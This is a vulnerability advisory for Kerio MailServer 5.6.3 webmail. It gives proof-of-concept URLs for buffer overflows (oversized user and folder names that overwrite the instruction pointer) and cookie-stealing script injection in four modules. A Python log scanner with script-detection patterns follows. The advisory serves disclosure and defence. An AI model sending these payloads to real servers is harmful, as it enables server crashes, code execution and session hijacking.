Multiple buffer overflows and XSS in Kerio MailServer
Version affected :
5.6.3 ( the latest on the Kerio website )
Vendor status :
Vendor was notified
Description :
Kerio develops a mail server with support for the IMAP , POP3 , SMTP and SSL
protocols . Besides , it includes a webmail . This webmail is vulnerable
to basic cross site scripting attacks and buffer overflows that can lead to
session hijacking or to executing code with system privileges .
do_subscribe module
A long user name causes a total stack corruption and an access violation .
Three bytes of a thread's instruction pointer ( EIP ) are overwritten with the
user name we supplied , which makes it easy to execute code .
http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA
AAAAA
add_acl module
Due to insufficient sanitization of variables passed to the module that appear
on the screen , it is possible to inject a script that is executed in the context
of the webmail :
http://[server]/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>alert(document.cookie);</script>
If we set the folder to ~admin@localhost/INBOX and click the link , the mail
server stops with an access violation .
Besides , the add_acl module is affected by the long user name problem as
well :
http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA
@localhost/INBOX&add_name=lucas
The crash occurs in the same way , a sign that the same function is causing
the error .
list module
http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA
@localhost/INBOX
The same buffer overflow .
do_map module
Due to insufficient sanitization of variables passed to the module that appear
on the screen , it is possible to inject a script that is executed in the context
of the webmail :
http://[Server]/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie);</script>&folder=public&user=lucascavadora
Besides , it is vulnerable when using long user names :
http://[Server]/do_map?
action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
For these buffer overflows to be exploitable you need an account on the
webmail , but an intruder can build a link with code to execute and wait
for a user with an open Kerio MailServer session to click it .
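Because the requests above need a logged-in victim to click them , they leave a trace in the webmail's access logs . The following detection script is an added example , not part of the original advisory : it flags requests to the four affected modules whose reported parameters ( showuser , folder , add_name , alias , user ) carry script markup or exceed a length threshold . The 64-character threshold and the log line format are assumptions ; the sample log lines are constructed .

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Webmail modules and the parameters the advisory reports as unsafe.
WATCHED = {
    "/do_subscribe": ("showuser",),
    "/add_acl": ("folder", "add_name"),
    "/list": ("folder",),
    "/do_map": ("alias", "user"),
}
MAX_LEN = 64  # assumed threshold; mailbox and user names are normally far shorter
SCRIPT_RE = re.compile(r"<\s*/?\s*script\b|javascript:|\bon\w+\s*=", re.I)

def inspect_url(url):
    """Return findings as (module, parameter, reason) tuples for one request URL."""
    parts = urlsplit(url)
    params = WATCHED.get(parts.path)
    if not params:
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes once
    findings = []
    for name in params:
        for value in query.get(name, []):
            value = unquote(value)  # second pass catches double-encoded payloads
            if SCRIPT_RE.search(value):
                findings.append((parts.path, name, "script injection"))
            if len(value) > MAX_LEN:
                findings.append((parts.path, name, "oversized value"))
    return findings

def scan_log(lines):
    """Scan access-log lines of the assumed form 'METHOD URL STATUS'."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) >= 2:
            findings.extend(inspect_url(fields[1]))
    return findings

# Constructed sample log lines modelled on the request shapes in the advisory.
SAMPLE_LOG = [
    "GET /list?folder=~conde0@localhost/INBOX 200",
    "GET /add_acl?folder=~conde0@localhost/INBOX&add_name=%3Cscript%3Ealert(document.cookie)%3C/script%3E 200",
    "GET /add_acl?folder=~" + "A" * 200 + "@localhost/INBOX&add_name=lucas 500",
    "GET /do_map?action=new&oldalias=eso&alias=aaa&folder=public&user=" + "A" * 200 + " 500",
    "GET /do_subscribe?showuser=conde0 200",
]

if __name__ == "__main__":
    for module, param, reason in scan_log(SAMPLE_LOG):
        print(f"{module} {param}: {reason}")
```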
You can find a Spanish version of this advisory at
http://nautopia.org/vulnerabilidades/kerio_mailserver.htm
--
Regards ,
David F. Madrid
Madrid , Spain